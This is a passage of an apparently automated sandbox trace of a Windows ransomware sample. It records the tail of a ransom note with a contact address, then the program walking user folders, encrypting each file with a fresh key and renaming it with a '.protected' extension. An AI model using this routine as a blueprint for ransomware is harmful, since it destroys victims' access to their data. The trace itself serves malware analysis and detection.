SERVER-ID:\r\n") returned 1341 [0091.780] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.781] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.781] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.781] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.781] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.782] CloseHandle (hObject=0xb4) returned 1 [0091.790] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Windows") returned -1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Program Files") returned -1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="Program Files (x86)") returned -1 [0091.790] lstrcmpiW (lpString1="Microsoft Websites", lpString2="$Recycle.bin") returned 1 [0091.790] lstrcmpiW (lpString1="Microsoft 
Websites", lpString2="System Volume Information") returned -1 [0091.791] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites") returned 62 [0091.791] lstrcmpW (lpString1="Microsoft Websites", lpString2=".") returned 1 [0091.791] lstrcmpW (lpString1="Microsoft Websites", lpString2="..") returned 1 [0091.791] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*") returned 64 [0091.791] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.800] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.800] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.800] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.800] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.800] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.800] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\.") returned 64 [0091.800] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.800] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.800] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.801] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.801] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.801] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.801] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.801] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\..") returned 65 [0091.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.801] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Windows") returned -1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Program Files") returned -1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="Program Files (x86)") returned -1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="$Recycle.bin") returned 1 [0091.801] lstrcmpiW (lpString1="IE Add-on site.url", lpString2="System Volume Information") returned -1 [0091.801] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0091.801] StrStrIW (lpFirst="IE Add-on site.url", lpSrch=".protected") returned 0x0 [0091.801] lstrcmpW (lpString1="IE Add-on site.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.801] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.801] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft 
Websites\\IE Add-on site.url") returned 81 [0091.802] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".txt") returned 0x0 [0091.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0091.802] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".rar") returned 0x0 [0091.802] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0091.802] StrStrW (lpFirst="IE Add-on site.url", lpSrch=".zip") returned 0x0 [0091.802] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.803] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.803] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.803] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.803] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.803] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.804] CloseHandle (hObject=0xd4) returned 1 [0091.804] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE 
Add-on site.url.protected") returned 91 [0091.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.protected")) returned 1 [0091.805] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.805] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Windows") returned -1 [0091.805] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Program Files") returned -1 [0091.805] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="Program Files (x86)") returned -1 [0091.805] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="$Recycle.bin") returned 1 [0091.806] lstrcmpiW (lpString1="IE site on Microsoft.com.url", lpString2="System Volume Information") returned -1 [0091.806] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0091.806] StrStrIW (lpFirst="IE site on Microsoft.com.url", lpSrch=".protected") returned 0x0 [0091.806] lstrcmpW (lpString1="IE site on Microsoft.com.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.806] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.806] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on 
Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0091.806] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".txt") returned 0x0 [0091.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0091.806] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".rar") returned 0x0 [0091.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0091.806] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch=".zip") returned 0x0 [0091.806] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.807] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.807] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.808] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.808] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 
[0091.808] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.808] CloseHandle (hObject=0xd4) returned 1 [0091.809] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.protected") returned 101 [0091.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url.protected")) returned 1 [0091.810] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Windows") returned -1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Program Files") returned -1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="Program Files (x86)") returned -1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="$Recycle.bin") returned 1 [0091.810] lstrcmpiW (lpString1="Microsoft At Home.url", lpString2="System Volume Information") returned -1 [0091.810] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0091.810] StrStrIW (lpFirst="Microsoft At Home.url", lpSrch=".protected") returned 0x0 [0091.810] lstrcmpW (lpString1="Microsoft At Home.url", lpString2="RESTORE_FILES.txt") returned 
-1 [0091.810] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.810] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0091.811] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".txt") returned 0x0 [0091.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0091.811] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".rar") returned 0x0 [0091.811] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0091.811] StrStrW (lpFirst="Microsoft At Home.url", lpSrch=".zip") returned 0x0 [0091.811] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.812] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.812] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 
[0091.812] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.812] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.813] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.813] CloseHandle (hObject=0xd4) returned 1 [0091.813] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.protected") returned 94 [0091.814] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.protected")) returned 1 [0091.824] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Windows") returned -1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Program Files") returned -1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="Program Files (x86)") returned -1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="$Recycle.bin") returned 1 [0091.824] lstrcmpiW (lpString1="Microsoft At Work.url", lpString2="System Volume Information") returned -1 [0091.825] wnsprintfW (in: 
pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0091.825] StrStrIW (lpFirst="Microsoft At Work.url", lpSrch=".protected") returned 0x0 [0091.825] lstrcmpW (lpString1="Microsoft At Work.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.825] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.825] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.825] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0091.826] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".txt") returned 0x0 [0091.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0091.826] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".rar") returned 0x0 [0091.826] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0091.826] StrStrW (lpFirst="Microsoft At Work.url", lpSrch=".zip") returned 0x0 [0091.826] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.827] SetFilePointerEx (in: hFile=0xd4, 
liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.827] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.827] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.828] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.828] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.828] CloseHandle (hObject=0xd4) returned 1 [0091.830] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.protected") returned 94 [0091.830] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url.protected")) returned 1 [0091.831] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Windows") returned -1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Program Files") 
returned -1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="Program Files (x86)") returned -1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="$Recycle.bin") returned 1 [0091.831] lstrcmpiW (lpString1="Microsoft Store.url", lpString2="System Volume Information") returned -1 [0091.831] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0091.831] StrStrIW (lpFirst="Microsoft Store.url", lpSrch=".protected") returned 0x0 [0091.832] lstrcmpW (lpString1="Microsoft Store.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.832] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.832] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.852] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0091.852] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".txt") returned 0x0 [0091.852] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0091.852] StrStrW (lpFirst="Microsoft Store.url", lpSrch=".rar") returned 0x0 [0091.852] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0091.852] StrStrW (lpFirst="Microsoft 
Store.url", lpSrch=".zip") returned 0x0 [0091.852] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x86, lpOverlapped=0x0) returned 1 [0091.853] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.853] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x86, lpOverlapped=0x0) returned 1 [0091.854] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.854] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, 